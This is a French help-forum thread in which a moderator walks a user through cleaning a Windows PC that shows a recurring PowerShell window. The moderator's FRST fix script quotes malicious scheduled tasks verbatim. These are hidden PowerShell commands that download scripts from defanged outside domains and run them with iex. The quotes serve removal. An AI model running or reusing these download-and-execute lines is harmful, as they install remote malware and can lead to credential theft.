Fenêtre powershell

Résolu
sandramp11 Messages postés 5 Statut Membre -  
bazfile Messages postés 58492 Date d'inscription   Statut Modérateur Dernière intervention   -
Bonjour,

J'ai une fenetre bleue powershell... qui s'affiche de manière intempestive. J'ai trouvé sur le forum une marche à suivre mais il faut toujours envoyer un lien à une personne.

Est ce que quelqu'un peut m'aider svp?

6 réponses

  1. bazfile Messages postés 58492 Date d'inscription   Statut Modérateur Dernière intervention   20 269
     
    Bonjour.
    Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

    Clique sur Analyser

    Attention, attendre que les messages disant que l'analyse est terminée s'affichent



    À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition


    Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
    0
  2. bazfile Messages postés 58492 Date d'inscription   Statut Modérateur Dernière intervention   20 269
     
    Bonjour,

    Désinstalle WebAdvisor par McAfee c'est un adware.

    Procédure à faire dans l'ordre indiqué :

    1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
    2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
    Start::
    CreateRestorePoint:
    CloseProcesses:
    Startup: C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS [2022-05-04] () [Fichier non signé]
    Task: {22D33687-DB97-465E-91EE-88E87C4D7315} - System32\Tasks\Unlimited => C:\ProgramData\Unlimited\ISO\Unlimited.vbs [207 2022-05-11] () [Fichier non signé]
    Task: {4196150C-7D1B-4212-B97B-72FCA87CEFA0} - System32\Tasks\Error => C:\ProgramData\Error\ISO\Error.vbs [12395 2022-06-05] () [Fichier non signé]
    Task: {6D337A76-BA1D-47FC-A9F0-70128E763F11} - System32\Tasks\Turismo => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/tur/turismo.jpg"" -useB|iex;
    Task: {CB425767-D91C-4BD6-BC96-495375A83BD4} - System32\Tasks\HomeOffice => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
    Task: {E022830E-8C34-429E-96A0-D99407D83010} - System32\Tasks\CCleanData => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex;
    Task: {F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE} - System32\Tasks\AudioHD32 => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
    Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
    Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
    Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
    Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
    CHR Notifications: Default -> hxxps://business.facebook.com; hxxps://www.aidetechniqueauto.fr; hxxps://www.epson.co.uk; hxxps://www.epson.fr; hxxps://www.legisocial.fr; hxxps://www.thaiairways.com
    CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E211FR885G0&p={searchTerms}
    FirewallRules: [{079473BA-C039-4215-AFFA-FB367D5C5F38}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
    FirewallRules: [{502B5D49-C7D3-434B-96D2-BD8520312154}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
    FirewallRules: [{2045AC83-7DBD-4C98-B98B-6331608C961F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => Pas de fichier
    FirewallRules: [{0635A61D-F21F-4A37-811D-1D8571E683E2}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
    FirewallRules: [{8123CDC8-3D05-4547-A7C4-8997F334712D}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
    FirewallRules: [{A197C030-5DA6-4603-B083-59004D41DB44}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
    FirewallRules: [{3B3D98D6-F91F-421C-A020-08DA14413169}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
    FirewallRules: [{CC5A3340-BAD1-4A8C-996B-4447948A8499}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
    FirewallRules: [{1B56139A-2C80-4009-A3C8-8E96815D7466}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
    C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS
    C:\ProgramData\Unlimited\ISO\Unlimited.vbs
    C:\ProgramData\Error\ISO\Error.vbs
    EmptyTemp:
    End::

    3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.



    Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

    Puis une fois ton ordinateur redémarré :
    4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.

    5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


    POUR INFORMATION:

    Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.

    0
  3. sandramp11 Messages postés 5 Statut Membre
     
    merci de ta réponse rapide.

    Quand je vais dans le dossier mc afee pr supprimer le dossier web advisor, il ne veut pas car il me dit qu'il est ouvert ailleurs mais je ne sais pas où. Je n'ai rien pour mettre en suspens l'anti virus.
    0
    1. bazfile Messages postés 58492 Date d'inscription   Statut Modérateur Dernière intervention   20 269
       
      Pour webadvisor on verra ça après ce n'est pas très grave.
      As-tu fait la procédure de correction FRST ?
      0
  4. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  5. sandramp11 Messages postés 5 Statut Membre
     
    ok,
    non du coup,
    je m'y met
    0
  6. sandramp11 Messages postés 5 Statut Membre
     
    https://www.cjoint.com/c/LFfrThbRYrS

    depuis le redémarrage, rien, affaire à suivre..

    merci beaucoup en tout cas si cela a fonctionné
    0
    1. bazfile Messages postés 58492 Date d'inscription   Statut Modérateur Dernière intervention   20 269
       
      Le fixlog est OK, tu ne devrais plus être embêté.
      Par prudence change tes mots de passe en ligne ils ont pu être dérobés.

      Pour WebAdvisor par McAfee tu peux le désinstaller avec Revo Uninstaller en mode scan avancé.

      Tutoriel Revo Uninstaller à lire attentivement.






      Accepter la désinstallation du programme que l'on souhaite désinstaller et si il y a un message d'erreur disant que la désinstallation est impossible fermer le message d'erreur et continuer la procédure.


      Cocher "Scan avancé" puis cliquer sur "Scan".


      Cliquer sur "Sélectionner tout" puis sur "Supprimer" si une deuxième liste apparaît faire de même puis une fois que tout est supprimé cliquer sur "Fini" un redémarrage sera peut-être demandé.

      Pour terminer.

      Si tout est OK pour toi et que ton pc fonctionne bien, tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.

      .
      0